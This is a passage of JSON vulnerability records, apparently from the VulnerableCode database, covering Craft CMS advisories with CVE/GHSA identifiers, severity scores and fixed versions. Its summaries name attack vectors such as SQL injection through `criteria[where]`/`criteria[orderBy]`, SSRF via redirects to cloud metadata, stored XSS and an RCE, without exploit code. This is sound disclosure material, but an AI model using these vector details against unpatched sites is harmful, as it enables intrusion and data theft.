:[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fxp3-g6gw-4r4v"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-fxp3-g6gw-4r4v","reference_id":"GHSA-fxp3-g6gw-4r4v","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:30:18Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-fxp3-g6gw-4r4v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73952?format=json","purl":"pkg:composer/craftcms/cms@5.9.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-6ban-jvfq-w3at"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.0-beta.1"}],"aliases":["CVE-2026-25497","GHSA-fxp3-g6gw-4r4v"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kbrc-85av-nfcn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50612?format=json","vulnerability_id":"VCID-m5rf-usae-yfb7","summary":"Craft CMS Vulnerable to Stored XSS in Settings Names and Field Options\nStored XSS in multiple settings. Names/labels are rendered without sanitization via `checkbox.twig` template which uses `{{ label|raw }}`.\n\n---","references":[{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/67780a778c6ec04e68e64a0b1177c168306144a2","reference_id":"","reference_type":"","scores":[{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/commit/67780a778c6ec04e68e64a0b1177c168306144a2"},{"reference_url":"https://github.com/craftcms/cms/commit/943152d2246b36f12adf161a03b8695b773d9276","reference_id":"","reference_type":"","scores":[{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/commit/943152d2246b36f12adf161a03b8695b773d9276"},{"reference_url":"https://github.com/advisories/GHSA-4mgv-366x-qxvx","reference_id":"GHSA-4mgv-366x-qxvx","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4mgv-366x-qxvx"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-4mgv-366x-qxvx","reference_id":"GHSA-4mgv-366x-qxvx","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-4mgv-366x-qxvx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73952?format=json","purl":"pkg:composer/craftcms/cms@5.9.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-6ban-jvfq-w3at"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.0-beta.1"}],"aliases":["GHSA-4mgv-366x-qxvx"],"risk_score":1.4,"exploitability":"0.5","weighted_severity":"2.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-m5rf-usae-yfb7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91453?format=json","vulnerability_id":"VCID-nmzu-mefv-tqeh","summary":"Craft CMS' anonymous \"assets/image-editor\" calls return private asset editor metadata to unauthorized users\n### Summary\n\nA low-privileged authenticated user can call `assets/image-editor` with the ID of a private asset they cannot view and still receive editor response data, including `focalPoint`.\n\nThe endpoint returns private editing metadata without per-asset authorization validation.\n\nRoot-cause analysis:\n\n1. `actionImageEditor()` accepts `assetId` from the request body.\n2. The asset is loaded, and the focal-point data is read.\n3. Response returns `html` and `focalPoint`.\n4. No explicit authorization check is applied before the response.\n\n### Impact\n\n## Affected deployments:\n\n* Craft sites where asset edit metadata should remain restricted to authorized users.\n\n## Security consequence:\n\n* Unauthorized users can extract private editor metadata and related editor context for inaccessible assets.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33161","reference_id":"","reference_type":"","scores":[{"value":"0.00042","scoring_system":"epss","scoring_elements":"0.1307","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33161"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"1.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/d30df3112220db1ffd6726a3ed11857014c7fb27","reference_id":"","reference_type":"","scores":[{"value":"1.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T18:01:51Z/"}],"url":"https://github.com/craftcms/cms/commit/d30df3112220db1ffd6726a3ed11857014c7fb27"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/4.17.8","reference_id":"","reference_type":"","scores":[{"value":"1.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T18:01:51Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/4.17.8"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.9.14","reference_id":"","reference_type":"","scores":[{"value":"1.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T18:01:51Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/5.9.14"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-vgjg-248p-rfm2","reference_id":"","reference_type":"","scores":[{"value":"1.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T18:01:51Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-vgjg-248p-rfm2"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33161","reference_id":"","reference_type":"","scores":[{"value":"1.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33161"},{"reference_url":"https://github.com/advisories/GHSA-vgjg-248p-rfm2","reference_id":"GHSA-vgjg-248p-rfm2","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-vgjg-248p-rfm2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/113238?format=json","purl":"pkg:composer/craftcms/cms@5.9.14","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-gzry-xtu5-ukhu"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.14"}],"aliases":["CVE-2026-33161","GHSA-vgjg-248p-rfm2"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-nmzu-mefv-tqeh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50867?format=json","vulnerability_id":"VCID-pgm4-svq8-tfc5","summary":"CraftCMS's `ElementSearchController` Affected by Blind SQL Injection\nThe `ElementSearchController::actionSearch()` endpoint is missing the `unset()` protection that\nwas added to ElementIndexesController in [GHSA-2453-mppf-46cj](https://github.com/craftcms/cms/security/advisories/GHSA-2453-mppf-46cj).\n\nThe exact same SQL injection vulnerability (including `criteria[orderBy]`, the original advisory vector) works on this controller because the fix was never applied to it.\n\nAny authenticated control panel user (no admin required) can inject arbitrary SQL via `criteria[where]`,\n`criteria[orderBy]`, or other query properties, and extract the full database contents via boolean-based blind injection.\n\nUsers should update to the patched 5.9.9 release to mitigate the issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31858","reference_id":"","reference_type":"","scores":[{"value":"0.00043","scoring_system":"epss","scoring_elements":"0.13534","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31858"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/e1a3dd669ae31491b86ad996e88a1d30d33d9a42","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-03-12T14:01:02Z/"}],"url":"https://github.com/craftcms/cms/commit/e1a3dd669ae31491b86ad996e88a1d30d33d9a42"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31858","reference_id":"CVE-2026-31858","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31858"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-2453-mppf-46cj","reference_id":"GHSA-2453-mppf-46cj","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-2453-mppf-46cj"},{"reference_url":"https://github.com/advisories/GHSA-g7j6-fmwx-7vp8","reference_id":"GHSA-g7j6-fmwx-7vp8","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-g7j6-fmwx-7vp8"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-g7j6-fmwx-7vp8","reference_id":"GHSA-g7j6-fmwx-7vp8","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-03-12T14:01:02Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-g7j6-fmwx-7vp8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74806?format=json","purl":"pkg:composer/craftcms/cms@5.9.9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-6ban-jvfq-w3at"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.9"}],"aliases":["CVE-2026-31858","GHSA-g7j6-fmwx-7vp8"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-pgm4-svq8-tfc5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50080?format=json","vulnerability_id":"VCID-ppet-ruae-1kav","summary":"Craft CMS Vulnerable to SSRF in GraphQL Asset Mutation via HTTP Redirect\nThe `saveAsset` GraphQL mutation validates the initial URL hostname and resolved IP against a blocklist, but Guzzle follows HTTP redirects by default. An attacker can bypass all SSRF protections by hosting a redirect that points to cloud metadata endpoints or any internal IP addresses.\n\n---","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25493","reference_id":"","reference_type":"","scores":[{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.05057","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25493"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/0974055634af68998f67850ab2045d8aaa19fa98","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:50Z/"}],"url":"https://github.com/craftcms/cms/commit/0974055634af68998f67850ab2045d8aaa19fa98"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/4.16.18","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/releases/tag/4.16.18"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.8.22","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:50Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/5.8.22"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25493","reference_id":"CVE-2026-25493","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25493"},{"reference_url":"https://github.com/advisories/GHSA-8jr8-7hr4-vhfx","reference_id":"GHSA-8jr8-7hr4-vhfx","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8jr8-7hr4-vhfx"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-8jr8-7hr4-vhfx","reference_id":"GHSA-8jr8-7hr4-vhfx","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:50Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-8jr8-7hr4-vhfx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73946?format=json","purl":"pkg:composer/craftcms/cms@5.8.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.22"}],"aliases":["CVE-2026-25493","GHSA-8jr8-7hr4-vhfx"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ppet-ruae-1kav"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/57189?format=json","vulnerability_id":"VCID-qq68-3j4y-47am","summary":"Craft CMS Allows Remote Code Execution\nThis is an additional fix for https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g\n\nThis is a high-impact, low-complexity attack vector. To mitigate the issue, users running Craft installations before the fixed versions are encouraged to update to at least that version.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-32432","reference_id":"","reference_type":"","scores":[{"value":"0.93094","scoring_system":"epss","scoring_elements":"0.99798","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-32432"},{"reference_url":"https://craftcms.com/knowledge-base/craft-cms-cve-2025-32432","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://craftcms.com/knowledge-base/craft-cms-cve-2025-32432"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/blob/3.x/CHANGELOG.md#3915---2025-04-10-critical","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Act","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2026-03-20T15:24:23Z/"}],"url":"https://github.com/craftcms/cms/blob/3.x/CHANGELOG.md#3915---2025-04-10-critical"},{"reference_url":"https://github.com/craftcms/cms/blob/4.x/CHANGELOG.md#41415---2025-04-10-critical","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Act","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2026-03-20T15:24:23Z/"}],"url":"https://github.com/craftcms/cms/blob/4.x/CHANGELOG.md#41415---2025-04-10-critical"},{"reference_url":"https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5617---2025-04-10-critical","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"10.0","scoring_system":"cvssv3.1","scor